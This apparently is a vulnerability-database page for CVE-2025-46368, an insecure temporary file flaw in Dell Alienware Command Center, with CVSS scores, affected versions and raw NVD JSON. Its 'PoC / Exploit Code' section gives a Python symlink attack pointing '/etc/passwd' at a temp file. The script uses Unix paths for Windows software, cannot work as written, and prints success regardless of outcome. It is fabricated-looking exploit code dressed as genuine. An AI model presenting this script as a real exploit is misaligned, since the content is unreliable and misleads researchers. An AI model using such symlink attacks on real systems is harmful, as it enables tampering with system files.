Security Vulnerability Report
中文
CVE-2025-46368 CVSS 6.6 MEDIUM

CVE-2025-46368

Published: 2025-11-13 20:15:50
Last Modified: 2025-11-17 12:27:19

Description

Dell Alienware Command Center 6.x (AWCC), versions prior to 6.10.15.0, contains an Insecure Temporary File vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Information tampering.

CVSS Details

CVSS Score
6.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:dell:alienware_command_center:*:*:*:*:*:*:*:* - VULNERABLE
Dell Alienware Command Center (AWCC) < 6.10.15.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import os import time # PoC for CVE-2025-46368 - Insecure Temporary File in Dell AWCC def exploit_awcc_temp_file(): temp_path = '/tmp/awcc_config.tmp' # Monitor for temp file creation while True: if os.path.exists(temp_path): print(f'Temp file detected: {temp_path}') # Attempt symlink attack try: os.symlink('/etc/passwd', temp_path) print('Symlink attack successful') except: pass time.sleep(1) if __name__ == '__main__': exploit_awcc_temp_file()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46368", "sourceIdentifier": "[email protected]", "published": "2025-11-13T20:15:49.893", "lastModified": "2025-11-17T12:27:18.617", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell Alienware Command Center 6.x (AWCC), versions prior to 6.10.15.0, contains an Insecure Temporary File vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Information tampering."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-377"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dell:alienware_command_center:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndExcluding": "6.10.15.0", "matchCriteriaId": "B4F88A51-8AAC-456E-9817-C159C81ACC20"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000379467/dsa-2025-392", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}